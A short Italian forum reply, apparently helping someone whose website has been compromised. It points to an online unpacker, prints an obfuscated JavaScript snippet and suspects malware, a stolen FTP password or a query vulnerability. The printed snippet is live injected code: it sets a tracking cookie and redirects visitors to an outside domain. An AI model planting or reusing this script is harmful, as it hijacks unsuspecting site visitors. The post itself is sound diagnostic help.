Primo passo: http://matthewfl.com/unPacker.html (uno dei tanti)
codice:
var _0x12bb=["\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x69\x70\x62\x73","\x31","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x72\x6C\x31\x32\x33\x2E\x69\x6E\x66\x6F\x2F"];
function ipbcc(_0x102ex2,_0x102ex3)
	{
	var _0x102ex4=new Date();
	_0x102ex4[_0x12bb[1]](_0x102ex4[_0x12bb[0]]()+86400000);
	var _0x102ex5=_0x12bb[2]+_0x102ex4[_0x12bb[3]]();
	document[_0x12bb[4]]=_0x102ex2+_0x12bb[5]+_0x102ex3+_0x102ex5+_0x12bb[6]
};
ipbcc(_0x12bb[7],_0x12bb[8]);
document[_0x12bb[9]]=_0x12bb[10]+ipbs;
Sospetto malware qualcuno ti ha rubato la password dell'FTP oppure hai una vulnerabilita' nelle query